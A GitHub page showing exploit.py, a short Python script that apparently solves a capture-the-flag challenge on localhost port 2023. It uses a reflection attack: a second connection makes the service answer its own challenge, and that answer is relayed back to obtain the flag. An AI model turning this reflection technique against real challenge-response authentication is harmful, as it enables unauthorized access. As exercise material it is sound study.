-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
36 lines (30 loc) · 1004 Bytes
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#!/usr/bin/env python3
import socket
target = 'localhost'
port = 2023
def get_valid_response(challenge):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
banner = s.recv(4096)
s.send((challenge + "\n").encode())
response_text = s.recv(4096).decode()
response_text = response_text.splitlines()[0]
response = response_text.split()[-1]
s.close()
print(f"Ask backend for challenge {challenge}: {response}")
return response
def solve():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
banner = s.recv(4096)
s.send(b"garbage\n")
challenge_text = s.recv(4096).decode()
challenge_text_lastline = challenge_text.splitlines()[-1]
challenge = challenge_text_lastline.split()[-1]
print(f"Our challenge is: {challenge}")
response = get_valid_response(challenge)
s.send((response + "\n").encode())
flag = s.recv(4096)
print(flag.decode())
s.close()
solve()